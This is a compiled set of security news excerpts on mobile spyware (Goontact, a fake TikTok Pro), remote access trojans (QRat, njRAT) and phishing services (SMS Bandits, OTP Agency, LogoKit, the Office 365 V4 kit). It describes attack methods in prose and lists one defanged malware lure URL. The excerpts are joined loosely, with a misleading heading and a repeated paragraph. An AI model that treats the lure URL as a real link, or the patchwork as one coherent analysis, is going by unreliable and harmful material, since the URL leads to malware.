speaking countries, Korea, and Japan, Lookout said in a report shared today
with ZDNet.
Although the malware has yet to reach official Apple and Google app stores, there
are signs that users are downloading and side-loading Goontact-infected
applications.

Data collected from these apps is sent back to online servers under the Goontact
operators' control. Based on the language used for the admin panels of these
servers, Lookout believes the Goontact operation is most likely managed by
Chinese-speaking threat actors.
LINKS SUGGEST CONNECTION TO PAST SEXTORTION CAMPAIGN
Apurva Kumar, Staff Security Intelligence Engineer at Lookout, told ZDNet that
the Goontact operation is very similar to sextortion campaign described by Trend
Micro in 2018 (PDF).
Although there is no tangible evidence at the moment, Kumar believes that data
collected through these apps could later be used to extort victims into paying small
ransoms or have their attempts to arrange sexual encounters exposed to friends and
contacts.

"We have notified both Google and Apple of this threat and are actively
collaborating with them to protect all Android and iOS users from Goontact,"
Kumar told ZDNet in an email over the weekend.
"Apple has revoked the enterprise certificates used to sign the apps and, as a result,
the apps will stop working on devices," the Lookout security engineer added.

"Play Protect will notify a user if any Goontact Android samples are installed on
their device."

The list of names of all Goontact-infected apps is pretty exhaustive and is too long
to list here, but can be found at the end of this Lookout report, in case users want to
check and see if they've downloaded and installed any of the apps. The sites that
peddled Goontact-infected apps are listed below.

4. European Parliament paves path for tighter spyware export

controls

The European Parliament announced Monday that it is taking steps to curtail the exportation
of surveillance technologies, including spyware, outside of the European Union.

The action clears the path for the European Union to establish new ground rules for the
export and sale of so-called dual-use technologies, which can be used in legitimate but also
malicious ways that violate human rights. The premise of the new rules is to limit
authoritarian regimes’ ability to “secretly get their hands on European cyber-surveillance,”
Markéta Gregorovà, a member of European Parliament and a lead negotiator of the new
scheme, said in a statement.

The new guardrails will include an update to European export controls, such as inclusion of

licensing criteria that more heavily emphasizes human rights, and an EU-wide scheme that
dictates stricter export reporting requirements for member states.
“Parliament’s perseverance and assertiveness against a blockade by some member states has
paid off: respect for human rights will become an export standard,” Bernd Lange, a head of
the negotiating delegation and member of European Parliament, said in a statement. “It is an
EU milestone, as export rules for surveillance technologies have been agreed for the first
time. Economic interests must not take precedence over human rights.”

Human rights groups and advocates have been trying to make inroads in limiting the export
of spyware in recent years around the world, but have been obstructed by courts and lack of
political will. The EU’s forthcoming stricter controls on the transfer of spyware marks a step
forward for those trying to stymie human rights abuses that can result
when surveillance technologies fall into the wrong hands.

Officials at the United Nations called last year for a moratorium on the sale, transfer, and
export of spyware worldwide. Security researchers have also called for stricter controls on
state-sponsored malware and surveillance tools.

But when lawyers from Amnesty International asked a judge in Israel to revoke the export
license of Israeli software surveillance firm NSO Group over allegations its technologies
were used against dissidents and human rights activists, they were rejected.

European Parliament’s announcement is not entirely a surprise — the EU has been working
to better control dual-use technologies for years. The move comes four years after the
European Commission tabled a proposal on how EU member states sell dual-use goods
outside the bloc, in which negotiators argued surveillance technologies must be included in
consideration.

“The type of arms most relevant for armed conflicts have changed over time and continue to
change rapidly,” the negotiators wrote in an explanatory statement. “The EU needs to react to
this threat by including cyber technologies in the EU export control regime, so that this
technology is not used to seriously violate human rights and, thereby, undermine security,
democracy, pluralism and freedom of expression.”

The action is not finalized yet, as the International Trade Committee, Parliament, and the
Council still need to endorse the agreement, according to European Parliament.

5. A detailed analysis of spyware masquerading as TikTok

A recent threat to ban TikTok in the United States has taken the internet by storm
and received mixed reactions from social media and internet users. U.S. President
Donald Trump has ordered ByteDance, the parent company of TikTok, to sell its
U.S. TikTok assets and also issued executive orders that would ban the social
media apps TikTok and WeChat from operating in the U.S. if the sale doesn’t
happen in the next few weeks. On the other side, ByteDance has filed a
lawsuit suing the Trump administration.
When popular applications come under fire and are featured prominently in the
news, hackers get excited as these newsworthy apps can become their latest target.
And TikTok is no exception.

Generally, after an application gets banned from an official app store, such as
Google Play, users try to find alternative ways to download the app. In doing so,
users can become victims to malicious apps portraying themselves as the original
app. Recently there was a huge wave of SMS messages, as well as Whatsapp
messages, making the rounds asking users to download the latest version of
TikTok at hxxp://tiny[.]cc/TiktokPro. In reality, this downloaded app is
a fake app that asks for credentials and Android permissions (including camera and
phone permissions), resulting in the user being bombarded with advertisements. 

Recently, we have come across another variant of this app portraying itself as
TikTok Pro, but this is a full-fledged spyware with premium features to spy on
victim with ease. (Please note this is a different app and not the same as the one
being spread by hxxp://tiny[.]cc/TiktokPro.)

What is Trojan?
Trojan, is a type of malicious code or software that looks legitimate but can take
control of your computer. A Trojan is designed to damage, disrupt, steal, or in
general inflict some other harmful action on your data or network.
A Trojan acts like a bona fide application or file to trick you. It seeks to deceive you
into loading and executing the malware on your device. Once installed, a Trojan can
perform the action it was designed for.
A Trojan is sometimes called a Trojan virus or a Trojan horse virus, but that’s a
misnomer. Viruses can execute and replicate themselves. A Trojan cannot. A user
has to execute Trojans. Even so, Trojan malware and Trojan virus are often used
interchangeably.
Whether you prefer calling it Trojan malware or a Trojan virus, it’s smart to know how
this infiltrator works and what you can do to keep your devices safe.

Real life examples of Trojan attacks

 1. President Trump-themed Malspam Email Delivers QRat
trojan

A new phishing campaign has been observed using a fake Donald Trump video as
a lure for malware delivery. The campaign enables hackers to remotely control the
infected system via QRat and provides the ability to steal passwords, along with
sensitive data.
What has happened?

The phishing emails use unrelated subject lines and filename. The email
subject claims to offer the victim a loan with a good value for money
investment to entice victims. However, the email comes with a malicious
attachment, claiming to be a video of President Donald Trump.

 If a user attempts to open the file, a Java Archive (JAR) file, will result in
the execution of the QRat installer.
 The trojan uses multiple layers of obfuscation to avoid being detected as
malicious activity. The code is encrypted in base64. In addition, it uses
Allatori Obfuscator to hide its modules.
 The malicious code of the malware downloader is split into numbered files,
along with some junk data.
 In addition, the malware uses a scam Microsoft ISC license, which shows a
message telling the user that the JAR file is being run for remote penetration
testing.

Recent incidents

 Recently, ElectroRAT was spotted to be stealing cryptocurrency wallets of

thousands of Windows, Linux, and macOS users.
 APT27 has been observed to be using PlugX RAT in a set of ransomware
incidents.

Conclusion

The increasing use of RATs for cyberattacks and that too with additional layers of
obfuscation makes security a concerning issue. Thus, experts suggest email
administrators take action against inbound JARs and block them in their email
security gateways to prevent JAR-based malware attacks. In addition,
organizations should provide training to their employees for spotting phishing
emails.

2. njRAT Trojan operators are now using Pastebin as

alternative to central command server

Operators of the njRAT Remote Access Trojan (RAT) are leveraging Pastebin C2
tunnels to avoid scrutiny by cybersecurity researchers. 
Palo Alto Networks' Unit 42 cybersecurity team said njRAT, also known as
Bladabindi, is being used to download and execute secondary-stage payloads from
Pastebin, scrapping the need to establish a traditional command-and-control (C2)
server altogether. 

Since October, at the least, operators have used Pastebin, a text storage and release
platform, as a host for payloads which differ in form and shape. In some cases,
dumps are base64 encoded, in others, hexadecimal and JSON data masks the true
nature of a dump, some are compressed blobs, and others are simply plaintext
instructions containing embedded, malicious URLs.

The team says that njRAT variants will call upon shortened URLs linking to
Pastebin in an attempt to "evade detection by security products and increase the
possibility of operating unnoticed."

Developed in .NET, njRAT is a widely-used Trojan that is able to hijack the

functions of a compromised machine remotely, including taking screenshots,
exfiltrating data, keylogging, and killing processes such as antivirus programs. In
addition, the RAT is able to execute secondary, malicious payloads and connect
infected PCs to botnets. 

The "Pastebin C2 tunnel" now in use, as described by the researchers, creates a

pathway between njRAT infections and new payloads. With the Trojan acting as a
downloader, it will grab encoded data dumped on Pastebin, decode, and deploy.

CNET: Hackers access documents related to authorized COVID-19 vaccines

In samples viewed by the team, one payload was decoded as a .NET executable
that abuses Windows API functions for keylogging and data theft. Other samples,
similar in function, required multiple layers of decoding to reveal the final
payload. 
JSON-formatted data, disguised on Pastebin, is believed to potentially act as
configuration files for the malware. Pastebin dumps have also been used to point
toward software downloads, including links to ProxyScraper. 

TechRepublic: Phishing emails: More than 25% of American workers fall for

them
Palo Alto says the Pastebin-based command architecture is still active and utilized
by the RAT to deliver secondary payloads. 

"Based on our research, malware authors are interested in hosting their second-
stage payloads in Pastebin and encrypting or obfuscating such data as a measure to
evade security solutions," the team says. "There is a possibility that malware
authors will use services like Pastebin for the long term."

Real life examples of phishing

1. Google Firebase hosts Microsoft Office phishing
attack

A phishing attack recently uncovered by researchers pretends to share information

about an electronic funds transfer (EFT) by offering up a link to download an
HTML invoice that then loads to a page with Microsoft Office branding that’s
hosted on Google Firebase.

The attack culminates with a final phishing page that looks to extract a victim’s
Microsoft login credentials, alternate email address, and phone number, Armorblox
researchers wrote in a blog post.

Impersonating Microsoft to phish for account credentials continues to be a

powerful technique because it’s a way for attackers to insert themselves into
normal business workflows, said Rajat Upadhyaya, head of engineering at
Armorblox.

“Viewing documents via Office 365 is something we do every day, so victims

might think it’s not unusual to enter login credentials in this situation,” Upadhyaya
said. “Plus, hosting the final phishing page on Google Firebase lends the domain
inherent legitimacy and allows it to bypass email security blocklists and filters.”

The email attack bypassed native Microsoft email security controls. Microsoft
assigned a Spam Confidence Level (SCL) of ‘1’ to this email, which means that
tech giant did not determine the email as suspicious and delivered it to end user
mailboxes.
“The individual techniques have been employed by hackers before, but it’s the
combination of techniques that makes it possible for this email attack to bypass
Microsoft email security as well as pass the eye tests of victims,” Upadhyaya said.

“Employing link redirects and a downloadable HTML file to view the final
payload makes it difficult for security technologies to follow the link to its final
destination,” he explained.

2. U.K. Arrest in ‘SMS Bandits’ Phishing Service

Authorities in the United Kingdom have arrested a 20-year-old man for allegedly
operating an online service for sending high-volume phishing campaigns via
mobile text messages. The service, marketed in the underground under the name
“SMS Bandits,” has been responsible for blasting out huge volumes of phishing
lures spoofing everything from COVID-19 pandemic relief efforts to PayPal,
telecommunications providers and tax revenue agencies.
The U.K.’s National Crime Agency (NCA) declined to name the suspect, but
confirmed that the Metropolitan Police Service’s cyber crime unit had detained an
individual from Birmingham in connection to a business that supplied “criminal
services related to phishing offenses.”
The proprietors of the phishing service were variously known on cybercrime
forums under handles such as SMSBandits, “Gmuni,” “Bamit9,” and “Uncle
Munis.” SMS Bandits offered an SMS phishing (a.k.a. “smishing”) service for the
mass sending of text messages designed to phish account credentials for different
popular websites and steal personal and financial data for resale.

The U.K.’s National Crime Agency (NCA) declined to name the suspect, but

confirmed that the Metropolitan Police Service’s cyber crime unit had detained an
individual from Birmingham in connection to a business that supplied “criminal
services related to phishing offenses.”

The proprietors of the phishing service were variously known on cybercrime

forums under handles such as SMSBandits, “Gmuni,” “Bamit9,” and “Uncle
Munis.” SMS Bandits offered an SMS phishing (a.k.a. “smishing”) service for the
mass sending of text messages designed to phish account credentials for different
popular websites and steal personal and financial data for resale.

For example, the SMS Bandits automated systems to check whether the phone
number list provided by their customers was indeed tied to actual mobile numbers,
and not landlines that might tip off telecommunications companies about mass
spam campaigns.

“The telcos are monitoring for malicious SMS messages on a number of fronts,”
Angus said. “One way to tip off an SMS gateway or wireless provider is to start
blasting text messages to phone numbers that can’t receive them.”
Scylla gathered reams of evidence showing the SMS Bandits used email addresses
and passwords stolen through its services to validate a variety of account
credentials — from PayPal to bank accounts and utilities providers. They would
then offload the working credentials onto marketplaces they controlled, and to
third-party vendors. One of SMS Bandits’ key offerings: An “auto-shop” web
panel for selling stolen account credentials.

SMS Bandits also provided their own “bulletproof hosting” service advertised as a
platform that supported “freedom of speach” [sic] where customers could “host
any content without restriction.” Invariably, that content constituted sites designed
to phish credentials from users of various online services.

The SMS Bandits phishing service is tied to another crime-friendly service called
“OTP Agency,” a bulk SMS provider that appears catered to phishers: The
service’s administrator stated on multiple forums that he worked directly with the
SMS Bandits.

Otp[.]agency advertises a service designed to help intercept one-time passwords

needed to log in to various websites. The customer enters the target’s phone
number and name, and OTP Agency will initiate an automated phone call to the
target that alerts them about unauthorized activity on their account.

The call prompts the target to enter a one-time password generated by their
phone’s mobile app, and that code is then relayed back to the scammer’s user panel
at the OTP Agency website.

“We call the holder with an automatic calling bot, with a very believable script,
they enter the OTP on the phone, and you’ll see it in real time,” OTP Agency
explained on their Telegram channel. The service, which costs anywhere from $40
to $125 per week, advertises unlimited international calling, as well as multiple
call scripts and voice accents.
 3. New cybercrime tool can build phishing pages in real-
time

A cybercrime group has developed a novel phishing toolkit that changes logos and
text on a phishing page in real-time to adapt to targeted victims.
Named LogoKit, this phishing tool is already deployed in the wild, according to
threat intelligence firm RiskIQ, which has been tracking its evolution.
The company said it already identified LogoKit installs on more than 300 domains
over the past week and more than 700 sites over the past month.

The security firm said LogoKit relies on sending users phishing links that contain
their email addresses.

"Once a victim navigates to the URL, LogoKit fetches the company logo from a
third-party service, such as Clearbit or Google's favicon database," RiskIQ security
researcher Adam Castleman said in a report on Wednesday.
"The victim email is also auto-filled into the email or username field, tricking
victims into feeling like they have previously logged into the site," he added.

"Should a victim enter their password, LogoKit performs an AJAX request,

sending the target's email and password to an external source, and, finally,
redirecting the user to their [legitimate] corporate web site."

Castleman said LogoKit achieves this only with an embeddable set of JavaScript
functions" that can be added to any generic login form or complex HTML
documents.

This is different from standard phishing kits, most of which need pixel-perfect
templates mimicking a company's authentication pages.

The kit's modularity allows LogoKit operators to target any company they want
with very little customization work and mount tens or hundreds of attacks a week
against a wide-ranging set of targets.

RiskIQ said that over the past month, it has seen LogoKit being used to mimic and
create login pages for services ranging from generic login portals to false
SharePoint portals, Adobe Document Cloud, OneDrive, Office 365, and several
cryptocurrency exchanges.

Because LogoKit is so small, the phishing kit doesn't always need its own complex
server setup, as some other phishing kits need. The kit can be hosted on hacked
sites or legitimate pages for the companies LogoKit operators want to target.
Furthermore, since LogoKit is a collection of JavaScript files, its resources can also
be hosted on public trusted services like Firebase, GitHub, Oracle Cloud, and
others, most of which will be whitelisted inside corporate environments and trigger
little alerts when loaded inside an employee's browser.

RiskIQ said its tracking this new threat closely due to the kit's simplicity, which the
security firm believes helps improve its chances of a successful phish.

4. Phishing scheme shows CEOs may be ‘most valuable

asset,’ and ‘greatest vulnerability’

Cybercriminals have been using a phishing kit featuring fake Office 365 password
alerts as a lure to target the credentials of chief executives, business owners and
other high-level corporate leaders. The scheme highlights the role and
responsibility upper management plays in ensuring the security of their own
company’s assets.

In a blog post on Monday, researchers from Trend Micro reported that they
uncovered 70 email addresses that have been targeted with the so-called “Office
365 V4 phishing kit” since May 2020, 40 of which belong to “CEOs, directors,
owners and founders, among other enterprise employee[s].”

Ryan Flores, senior manager of forward-looking threat research in APAC region at

Trend Micro, told SC Media that the finding was pretty striking, because typically
you would see a spam or phishing campaign sent to a wide range of email
addresses. But this one was “very deliberate” in that it “only sent to really a few
people in that organization.”

And very high-ranking people at that: Just over 45 percent of targeted individuals
carried the title of CEO. The next most frequently targeted titles were managing
director (9.7%) and CFO (4.8%). The attack has spanned a wide range of industry
sectors, including manufacturing, real estate, finance, government and technology,
and nearly 74% of businesses known to be targeted were located in America.

“Based on the data distribution, CEOs in the U.S. are obviously the main targets of
the threat actors that use the Office 365 V4 phishing kit,” the blog post concluded.
“As seen in this particular campaign, the attackers target high profile employees
who may not be as technically- or cybersecurity-savvy, and may be more likely to
be deceived into clicking on malicious links.”

This is why executives must hold themselves to the same security standards that
they would want their own employees to meet.
“CEOs and high-level executives are accustomed to being thought of as an
organizations’ biggest asset, while increasingly attackers see them as the greatest
vulnerability,” said Eyal Benishti, CEO at IRONSCALES. “This is a dichotomy
that executives must be humble enough to recognize as true, so that they can play
an active role in their company’s risk mitigation. Overall, CEOs and
other executives must lead from the front and act as a personal example to make
sure everyone sees security as a top priority.”

If these executives are tricked into giving away their passwords via malicious
phishing pages – which are hosted on legitimate sites – then the criminals can use
those passwords “for the purpose of conducting additional phishing attacks,
gaining access to sensitive information or conducting other social engineering
attacks.” Business email compromise (BEC) targeting could occur, as could
impersonation schemes that target other employees and third-party partners, the
blog post noted.

Indeed, Trend Micro pointed to several dark web forums selling compromised
executive Office 365 credentials at a cost of $250 to $500. The company could not
be certain, however, if the V4 phishing kit was involved.

For that reason, “all employees, regardless of company rank, should exercise
caution when reviewing and acting on email prompts for specific actions,
especially from unknown sources,” the blog post cautions.

Unfortunately, this isn’t always an easy lesson to get across. According to Flores,
CEOs and other top executives sometimes view email security mechanisms or
policies as “an inconvenience to them” and because of that, they behave in a way
that is “an exception to the rule.” 

“We need to realize that these executives do hold a lot of power,” Flores continued.
“If they get phished, [the attacker] would be able to control the email account of
that particular c-level executive and [be privy to] possible business deals, trade
secrets and whatever other business related things are happening.”

Benishti at IRONSCALES agreed that “there is definitely a subset of executives

and upper-level management in the business world that does not practice what their
organization preaches when it comes to security awareness training.” In many
cases, executives are even granted higher privileges or use their rank to be
excluded from other security controls.

As to why certain executives behave in this risky manner, there are numerous
factors.

“Some still believe that they are immune to being duped, even though they are well
aware that phishing techniques have evolved in sophistication,” said Benishti. “For
others, it’s a matter of prioritization. Very few executives believe that the threats to
their organization are overblown, but they may not have yet experienced a
significant cyber breach, meaning the perception of the risks are not as real or
time-sensitive as they should be.” 

Some senior executives also use a personal assistant to go through emails, which
can impact the individual’s ability to spot suspicious messages.

There are organizations out there that hold executives to high security standards.
Brandi Moore, chief operating officer at Cofense, said her company’s customers
“are very engaged with their c-suite, who often play a critical role in promoting the
organization’s phishing threat detection program.

“Many of our clients see the CFO and the finance team as the most frequent
reporters of phishing attacks to their SOC,” she said. “For most of our clients, it’s
much more likely that c-level executives are the biggest fans of the phishing
simulation program versus believing the threat is overblown.”

Moreover, companies can take steps to help educate their executives on targeted
threats by customizing their email security awareness training according to job
function. “Phishing simulations and training must be individually tailored to
specific departments and roles inside the organization in order to achieve its
goals,” said Benishti. “There simply is no one-size-fits-all when it comes to
simulation and training.”

Emails sent as part of the V4 phishing kit scam warned recipients that their Office
365 passwords were about to expire, giving them an option to click on a button that
would allow them to keep their current credentials. But as the Trend Micro blog
post notes, “legitimate service providers and vendors will never ask individual
consumers and enterprise users for details such as account access credentials, and
especially not to retain dated passwords.”

The phishing kit, which is available for sale on the dark web, uses several other
notable tricks to help avoid detection. For starters, most of the emails were sent via
a remote desktop protocol-based virtual private server (VPS) from FireVPS. Flores
said this is to bypass certain blacklists by using innocent-looking IP addresses that
appear to come from a normal laptop of desktop machine.

The phishing kit also has its own blocklist of domain names and IP address ranges
“to ensure that access is blocked when accessed by security companies or large
cloud providers,” the blog post stated. “We assume the intention is to evade
detection by security vendors as the list includes a number of antivirus companies,
Google, Microsoft, VirusTotal, and a long list of other cybersecurity and
technology companies, as well as public blocklisting sites.” Additionally, the
phishing kit can detect bot scans and web crawlers.
 5. Targeted Phishing Attacks Strike High-Ranking

Company Executives

An evolving phishing campaign observed at least since May 2020 has been found
to target high-ranking company executives across manufacturing, real estate,
finance, government, and technological sectors with the goal of obtaining sensitive
information.

The campaign hinges on a social engineering trick that involves sending emails to
potential victims containing fake Office 365 password expiration notifications as
lures. The messages also include an embedded link to retain the same password
that, when clicked, redirects users to a phishing page for credential harvesting.

"The attackers target high profile employees who may not be as technically or
cybersecurity savvy, and may be more likely to be deceived into clicking on
malicious links," Trend Micro researchers said in a Monday analysis.

"By selectively targeting C-level employees, the attacker significantly increases the
value of obtained credentials as they could lead to further access to sensitive
personal and organizational information, and used in other attacks."

According to the researchers, the targeted email addresses were mostly collected
from LinkedIn, while noting that the attackers could have purchased such target
lists from marketing websites that offer CEO/CFO email and social media profile
data.

The Office 365 phishing kit, currently in its fourth iteration (V4), is said to have
been originally released in July 2019, with additional features added to detect bot
scanning or crawling attempts and provide alternative content when bots are
detected. Interestingly, the alleged developer behind the malware announced V4's
availability on their "business" Facebook page in mid-2020.

Aside from selling the phishing kit, the actor has also been found to peddle account
credentials of CEOs, chief financial officers (CFOs), finance department members,
and other high-profile executives on social media pages.
What's more, Trend Micro's investigation unearthed a possible link to a user handle
on underground forums that was spotted selling a credential harvester tool as well
as stolen C-Level account passwords anywhere between $250 to $500

The researchers uncovered at least eight compromised phishing sites hosting the
V4 phishing kit, raising the possibility that they were used by different actors for a
wide range of phishing campaigns directed against CEOs, presidents, board
members, and founders of companies located in the U.S., the U.K., Canada,
Hungary, the Netherlands, and Israel.

"While organizations are aware and wary of the information they include in public-
facing websites and platforms, their respective employees should be constantly
reminded to be mindful of the details they disclose on personal pages," the
researchers concluded. "These can be easily used against them for attacks using
social engineering techniques."